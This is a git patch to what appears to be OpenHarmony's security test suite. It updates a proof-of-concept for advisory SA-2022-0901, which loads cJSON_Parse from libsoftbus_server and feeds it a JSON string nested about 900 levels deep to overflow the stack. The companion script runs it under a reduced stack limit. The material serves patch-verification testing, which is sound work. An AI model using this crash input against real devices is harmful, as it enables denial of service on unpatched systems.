From 554fa3d78f7da9d55c3401bb9b557c2e058584ee Mon Sep 17 00:00:00 2001 From: jingyu123412 <1565704822@qq.com> Date: Thu, 2 Mar 2023 17:37:57 +0800 Subject: [PATCH] =?UTF-8?q?=E6=8F=90=E4=BA=A4OpenHarmony-SA-2022-0901?= =?UTF-8?q?=E5=8A=A8=E6=80=81=E6=B5=8B=E8=AF=95=E7=94=A8=E4=BE=8B?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: jingyu123412 <1565704822@qq.com> --- .../{poc.c => poc.cpp} | 41 +++++++++++++++++-- .../2022-09/OpenHarmony-SA-2022-0901/poc.sh | 3 -- 2 files changed, 37 insertions(+), 7 deletions(-) rename demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/{poc.c => poc.cpp} (78%) diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp similarity index 78% rename from demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c rename to demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp index 442138216..4fdd7523d 100644 --- a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c +++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp @@ -1,4 +1,4 @@ -/* +/* * Copyright (c) 2023 Huawei Device Co., Ltd. * * Licensed under the Apache License, Version 2.0 (the "License"); @@ -13,12 +13,44 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -// 编译时需要使用-l参数链接cjson共享库 #include -#include +#include +//#include +#include +#include + +/* The cJSON structure: */ +typedef struct cJSON +{ + struct cJSON *next; + struct cJSON *prev; + struct cJSON *child; + int type; + char *valuestring; + int valueint; + double valuedouble; + char *string; +} cJSON; int main() { + void *handle; + // 打开共享库libsoftbus_server.z.so + handle = dlopen("/system/lib/libsoftbus_server.z.so", RTLD_LAZY); + if (!handle) + { + fprintf(stderr, "Error: %s\n", dlerror()); + return 1; + } + + // 获取函数DisplayManager::GetInstance地址 + typedef cJSON* (*Func)(char*); + Func cJSON_Parse = reinterpret_cast(dlsym(handle, "cJSON_Parse")); + if (cJSON_Parse == NULL) { + fprintf(stderr, "Error: %s\n", dlerror()); + dlclose(handle); + return 1; + } // 准备一个具有900层嵌套结构的json数据 char *json_string = "{\"a\":[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]}"; @@ -32,7 +64,8 @@ int main() } // 返回值不为null,没有修复漏洞,应该收到signal 11段错误提示 printf("OpenHarmony-SA-2022-0901 : vulnerable\n"); - cJSON_Delete(root); + //cJSON_Delete(root); return 0; } + diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh index a2b1eff38..3636c48f8 100644 --- a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh +++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh @@ -19,8 +19,5 @@ #或者也可以继续增加嵌套的层数,使栈溢出,每增加一层会多占用64B的栈空间 ulimit -s 60 -#设置LD_LIBARAY_PATH环境变量,指向cJSON的共享库文件存储位置 -export LD_LIBRARY_PATH=/data/local/tmp - #运行poc可执行程序 ./poc -- GitLab